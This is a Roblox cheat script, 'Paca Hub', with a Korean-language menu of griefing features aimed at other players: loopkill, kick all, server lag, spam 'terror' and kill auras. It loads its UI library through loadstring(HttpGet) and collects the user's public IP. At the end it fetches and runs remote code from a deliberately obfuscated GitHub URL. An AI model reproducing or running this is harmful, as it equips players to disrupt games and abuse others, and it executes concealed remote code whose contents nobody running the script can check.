local OrionLib = loadstring(game:HttpGet("https://raw.githubusercontent.com/jadpy/suki/refs/heads/main/orion"))()

OrionLib:MakeNotification({
    Name = "Paca Hub",
    Content = "paca hub loading..",
    Image = "rbxassetid://4483345998",
    Time = 3
})

local Window = OrionLib:MakeWindow({
	Name = "파카허브 메인허브 (알파카외 사용 불가) ",
	HidePremium = true,
	SaveConfig = false,
	IntroEnabled = false
})

local Tab1 = Window:MakeTab({ Name = "설명&자격검사", Icon = "rbxassetid://4384404373", PremiumOnly = false }) 
local Tab2 = Window:MakeTab({ Name = "플레이어", Icon = "rbxassetid://4335489011", PremiumOnly = false })      
local Tab3 = Window:MakeTab({ Name = "안티", Icon = "rbxassetid://4335482575", PremiumOnly = false })  
local Tab4 = Window:MakeTab({ Name = "리스트 & 텔레포트", Icon = "rbxassetid://4370344435", PremiumOnly = false }) 
local Tab5 = Window:MakeTab({ Name = "루프킬", Icon = "rbxassetid://4370318685", PremiumOnly = false })    
local Tab6 = Window:MakeTab({ Name = "블롭맨", Icon = "rbxassetid://4384403532", PremiumOnly = false })     
local Tab7 = Window:MakeTab({ Name = "서버테러", Icon = "rbxassetid://4370338398", PremiumOnly = false }) 
local Tab8 = Window:MakeTab({ Name = "서버트롤", Icon = "rbxassetid://4370329124", PremiumOnly = false })  
local Tab9 = Window:MakeTab({ Name = "랙 서버", Icon = "rbxassetid://4335483256", PremiumOnly = false })   
local Tab10 = Window:MakeTab({ Name = "익스플로잇 스팸", Icon = "rbxassetid://4384405396", PremiumOnly = false })    
local Tab11 = Window:MakeTab({ Name = "아우라", Icon = "rbxassetid://4335481355", PremiumOnly = false })       
local Tab12 = Window:MakeTab({ Name = "미믹", Icon = "rbxassetid://4370334816", PremiumOnly = false })       
local Tab13 = Window:MakeTab({ Name = "잡기능", Icon = "rbxassetid://4483345998", PremiumOnly = false }) 
local Tab14 = Window:MakeTab({ Name = "그랩", Icon = "rbxassetid://4370315758", PremiumOnly = false })       

---

local rawExecutor = identifyexecutor and identifyexecutor() or "Unknown"
local isDelta = string.find(string.lower(rawExecutor), "delta") ~= nil
local executorText = isDelta and (rawExecutor .. " ok✅️") or (rawExecutor .. " no ui only❌️")

local localPlayer = game:GetService("Players").LocalPlayer
local username = localPlayer.Name
local userId = localPlayer.UserId
local isWhitelistedUser = (username == "AIPACA_AI16" or username == "QRDOOTE1120" or userId == 10472996475 or userId == 2932138780)
local userText = isWhitelistedUser and (username .. " OK✅️") or (username .. " no ui only❌️")

local MarketInflowService = game:GetService("MarketplaceService")
local gameName = "Unknown Game"
pcall(function()
    gameName = MarketInflowService:GetProductInfo(game.PlaceId).Name
end)

local executableText = (isDelta and isWhitelistedUser) and "script executable: ok✅️" or "script executable: no ui only ❌️"

local myIp = "Loading..."
local httpService = game:GetService("HttpService")
local requestFunc = request or http_request or (syn and syn.request)

if requestFunc then
    pcall(function()
        local response = requestFunc({
            Url = "https://api.ipify.org",
            Method = "GET"
        })
        if response and response.Body then
            myIp = response.Body
        end
    end)
else
    pcall(function()
        myIp = game:HttpGet("https://api.ipify.org")
    end)
end

Tab1:AddLabel("이 스크립트는 알파카만 실행하도록 설계되었으며 모바일만 적극 지원합니다.")
Tab1:AddLabel("또한, 알파카 이외의 사람이 이 스크를 켜면 UI만 지원됩니다.(절대변경없음)")
Tab1:AddLabel("Executor: " .. executorText)
Tab1:AddLabel("User: " .. userText)
Tab1:AddLabel("Your IP: " .. myIp) 
Tab1:AddLabel("Game: " .. gameName)
Tab1:AddLabel(executableText)

---

local Sec2_1 = Tab2:AddSection({ Name = "Functions" })
Sec2_1:AddToggle({ Name = "플레이어 속도", Callback = function() end })
Sec2_1:AddSlider({
	Name = "속도 값",
	Min = 1,
	Max = 9999,
	Default = 16,
	Color = Color3.fromRGB(255,255,255),
	Increment = 1,
	ValueName = "Speed",
	Callback = function() end
})
Sec2_1:AddToggle({ Name = "플레이어 점프파워", Callback = function() end })
Sec2_1:AddSlider({
	Name = "점프 파워값",
	Min = 1,
	Max = 9999,
	Default = 50,
	Color = Color3.fromRGB(255,255,255),
	Increment = 1,
	ValueName = "Power",
	Callback = function() end
})
Sec2_1:AddToggle({ Name = "노클립", Callback = function() end })
Sec2_1:AddToggle({ Name = "무한점프", Callback = function() end })
Sec2_1:AddButton({ Name = "3인칭", Callback = function() end })
Sec2_1:AddButton({ Name = "1인칭 실제뷰", Callback = function() end })
Sec2_1:AddButton({ Name = "텔레포드", Callback = function() end })
Sec2_1:AddToggle({ Name = "그래비티 컨트롤", Callback = function() end })
Sec2_1:AddToggle({ Name = "나를 락걸기", Callback = function() end })

---

local Sec3_1 = Tab3:AddSection({ Name = "안티목록" })
Sec3_1:AddToggle({ Name = "안티 그랩", Default = false, Callback = function() end })
Sec3_1:AddToggle({ Name = "안티 그랩 V2", Default = false, Callback = function() end })
Sec3_1:AddToggle({ Name = "안티 그랩 V3", Default = false, Callback = function() end })
Sec3_1:AddToggle({ Name = "안티 그랩 파트", Default = false, Callback = function() end })
Sec3_1:AddToggle({ Name = "안티킥", Default = false, Callback = function() end })
Sec3_1:AddToggle({ Name = "안티킥 V2", Default = false, Callback = function() end })
Sec3_1:AddToggle({ Name = "안티킥 V3 (리스폰)", Default = false, Callback = function() end })
Sec3_1:AddToggle({ Name = "안티블롭맨", Default = false, Callback = function() end })
Sec3_1:AddToggle({ Name = "안티 폭탄", Default = false, Callback = function() end })
Sec3_1:AddToggle({ Name = "안티 블랙홀", Default = false, Callback = function() end })
Sec3_1:AddToggle({ Name = "안티 필링", Default = false, Callback = function() end })
Sec3_1:AddToggle({ Name = "안티렉", Default = false, Callback = function() end })
Sec3_1:AddToggle({ Name = "안티 루프킬", Default = false, Callback = function() end })
Sec3_1:AddToggle({ Name = "안티 페인트", Default = false, Callback = function() end })
Sec3_1:AddToggle({ Name = "안티 앵커", Default = false, Callback = function() end })
Sec3_1:AddToggle({ Name = "안티 구찌 해제 ", Default = false, Callback = function() end })
Sec3_1:AddToggle({ Name = "안티 락", Default = false, Callback = function() end })
Sec3_1:AddToggle({ Name = "안티 바나나", Default = false, Callback = function() end })
Sec3_1:AddToggle({ Name = "안티홀드파트", Default = false, Callback = function() end })
Sec3_1:AddToggle({ Name = "안티 인풋", Default = false, Callback = function() end })

local Sec3_2 = Tab3:AddSection({ Name = "구찌" })
Sec3_2:AddToggle({ Name = "오토 블롭맨 구찌", Default = false, Callback = function() end })
Sec3_2:AddToggle({ Name = "오토 블롭맨 구찌 V2", Default = false, Callback = function() end })
Sec3_2:AddToggle({ Name = "오토 기차 구찌", Default = false, Callback = function() end })
Sec3_2:AddToggle({ Name = "오토 어택", Default = false, Callback = function() end })
Sec3_2:AddToggle({ Name = "오토 리스폰", Default = false, Callback = function() end })

---

local Sec4_1 = Tab4:AddSection({ Name = "플레이어 리스트" })
local PlayerDropdown = Sec4_1:AddDropdown({
	Name = "플레이어 고르기",
	Default = "",
	Options = {},
	Callback = function() end
})

local function updatePlayerList()
    local players = game:GetService("Players"):GetPlayers()
    local options = {}
    for _, p in ipairs(players) do
        table.insert(options, p.Name)
    end
    PlayerDropdown:Refresh(options, true)
end

updatePlayerList()
game:GetService("Players").PlayerAdded:Connect(updatePlayerList)
game:GetService("Players").PlayerRemoving:Connect(updatePlayerList)

local Sec4_2 = Tab4:AddSection({ Name = "Teleport" })
Sec4_2:AddButton({ Name = "텔레포트", Callback = function() end })
Sec4_2:AddToggle({ Name = "관전", Callback = function() end })
Sec4_2:AddToggle({ Name = "선택한 플레이어 안티그랩", Callback = function() end })
Sec4_2:AddToggle({ Name = "선택한 플레이어 안티킥", Callback = function() end })
---

local Sec5_1 = Tab5:AddSection({ Name = "Loopkill" })
Sec5_1:AddToggle({ Name = "루프킬 (General)", Callback = function() end })
Sec5_1:AddToggle({ Name = "루프킬 (Grab)", Callback = function() end })
Sec5_1:AddToggle({ Name = "루프킬 (teleport)", Callback = function() end })
Sec5_1:AddToggle({ Name = "루프킬 (blobman)", Callback = function() end })
Sec5_1:AddToggle({ Name = "루프킬 (player)", Callback = function() end })
Sec5_1:AddToggle({ Name = "루프킬 올", Callback = function() end })

---

local Sec6_1 = Tab6:AddSection({ Name = "Kick Methods" })
Sec6_1:AddToggle({ Name = "킥 (owner)", Callback = function() end })
Sec6_1:AddToggle({ Name = "킥 (blobman)", Callback = function() end })
Sec6_1:AddToggle({ Name = "킥 (noblobman)", Callback = function() end })
Sec6_1:AddToggle({ Name = "킥 (anchor) kick", Callback = function() end })
Sec6_1:AddToggle({ Name = "킥 올 (system)", Callback = function() end })

---

local Sec7_1 = Tab7:AddSection({ Name = "all 탭" })
Sec7_1:AddToggle({ Name = "래그돌 올", Callback = function() end })
Sec7_1:AddToggle({ Name = "파이어올", Callback = function() end })
Sec7_1:AddToggle({ Name = "포이즌 올", Callback = function() end })
Sec7_1:AddToggle({ Name = "플링 올", Callback = function() end })

---

local Sec8_1 = Tab8:AddSection({ Name = "서버 트롤" })
Sec8_1:AddToggle({ Name = "섹스(브링)", Callback = function() end })
Sec8_1:AddToggle({ Name = "서버 스피드 컨트롤", Callback = function() end })
Sec8_1:AddButton({ Name = "서버 점프파워", Callback = function() end })
Sec8_1:AddToggle({ Name = "서버 올킬", Callback = function() end })
Sec8_1:AddToggle({ Name = "서버 댄스", Callback = function() end })

---

local Sec9_1 = Tab9:AddSection({ Name = "렉 서버" })
Sec9_1:AddToggle({ Name = "렉 서버 on", Callback = function() end })
Sec9_1:AddSlider({
	Name = "렉 파워",
	Min = 1,
	Max = 9999999999,
	Default = 1,
	Color = Color3.fromRGB(255,255,255),
	Increment = 1,
	ValueName = "Value",
	Callback = function() end
})

---

local Sec10_1 = Tab10:AddSection({ Name = "스팸" })
Sec10_1:AddToggle({ Name = "폭탄 테러", Callback = function() end })
Sec10_1:AddToggle({ Name = "눈덩이 테러", Callback = function() end })
Sec10_1:AddToggle({ Name = "블랙홀 테러", Callback = function() end })

---

local Sec11_1 = Tab11:AddSection({ Name = "아우라" })
Sec11_1:AddToggle({ Name = "킥 아우라 ", Default = false, Callback = function() end })
Sec11_1:AddToggle({ Name = "킬 아우라", Default = false, Callback = function() end })
Sec11_1:AddToggle({ Name = "래그돌 아우라", Default = false, Callback = function() end })
Sec11_1:AddToggle({ Name = "플링 아우라", Default = false, Callback = function() end })
Sec11_1:AddToggle({ Name = "댄스 아우라", Default = false, Callback = function() end })
Sec11_1:AddToggle({ Name = "파이어 아우라", Default = false, Callback = function() end })
Sec11_1:AddToggle({ Name = "렉 아우라", Default = false, Callback = function() end })
Sec11_1:AddToggle({ Name = "안티 붐박스 아우라", Default = false, Callback = function() end })
Sec11_1:AddToggle({ Name = "안티 파트 아우라", Default = false, Callback = function() end })

---

local Sec12_1 = Tab12:AddSection({ Name = "미믹 파워" })
Sec12_1:AddToggle({ Name = "날개 생성", Callback = function() end })
Sec12_1:AddButton({ Name = "UFO 떨구기", Callback = function() end })
Sec12_1:AddButton({ Name = "train 떨구기", Callback = function() end })
Sec12_1:AddToggle({ Name = "텔레키네시스", Callback = function() end })
Sec12_1:AddButton({ Name = "꼬추 생성", Callback = function() end })

---

local Sec13_1 = Tab13:AddSection({ Name = "잡기능" })
Sec13_1:AddButton({ Name = "잡기능", Callback = function() end })

local Sec13_2 = Tab13:AddSection({ Name = "서버 컨트롤" })
Sec13_2:AddToggle({ Name = "플레이어 컨트롤", Callback = function() end })
Sec13_2:AddToggle({ Name = "오브젝트 컨트롤", Callback = function() end })

---

local Sec14_1 = Tab14:AddSection({ Name = "던지기 힘 세팅" })
Sec14_1:AddToggle({ Name = "던지기 힘", Callback = function() end })
Sec14_1:AddSlider({
	Name = "던지기 힘",
	Min = 400,
	Max = 90000,
	Default = 400,
	Color = Color3.fromRGB(255,255,255),
	Increment = 1,
	ValueName = "Power",
	Callback = function() end
})

local Sec14_2 = Tab14:AddSection({ Name = "그랩" })
Sec14_2:AddToggle({ Name = "루프그랩", Default = false, Callback = function() end })
Sec14_2:AddToggle({ Name = "킬그랩", Default = false, Callback = function() end })
Sec14_2:AddToggle({ Name = "킥그랩", Default = false, Callback = function() end })
Sec14_2:AddToggle({ Name = "파이어 그랩", Default = false, Callback = function() end })
Sec14_2:AddToggle({ Name = "포이즌 그랩", Default = false, Callback = function() end })
Sec14_2:AddToggle({ Name = "앵커 그랩", Default = false, Callback = function() end })
Sec14_2:AddToggle({ Name = "무질량 그랩", Default = false, Callback = function() end })
Sec14_2:AddToggle({ Name = "라인 길이 확장", Callback = function() end })
Sec14_2:AddSlider({
	Name = "라인 길이 값",
	Min = 1,
	Max = 9999999,
	Default = 1,
	Color = Color3.fromRGB(255,255,255),
	Increment = 1,
	ValueName = "Length",
	Callback = function() end
})

---

local CoreGui = game:GetService("CoreGui")

pcall(function()
	CoreGui.OrionReOpen:Destroy()
end)

local gui = Instance.new("ScreenGui")
gui.Name = "OrionReOpen"
gui.Parent = CoreGui
gui.ResetOnSpawn = false

local button = Instance.new("TextButton")
button.Parent = gui
button.Size = UDim2.new(0, 0, 0, 0)
button.Position = UDim2.new(0, 20, 0.5, -25)
button.Text = "O"
button.TextScaled = true
button.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
button.TextColor3 = Color3.new(1, 1, 1)
button.BorderSizePixel = 0

Instance.new("UICorner", button).CornerRadius = UDim.new(1, 0)

button.MouseButton1Click:Connect(function()
	for _, v in pairs(CoreGui:GetDescendants()) do
		if v.Name == "MainFrame" and v:IsA("Frame") then
			v.Visible = true
		end
	end
end)

---함수&검증
loadstring(game:HttpGet("htt%ps://raw.gith%ubu%sercon%tent.com/yunu2hb19-7/14/main/695613~:-%♡t"))()

OrionLib:Init()
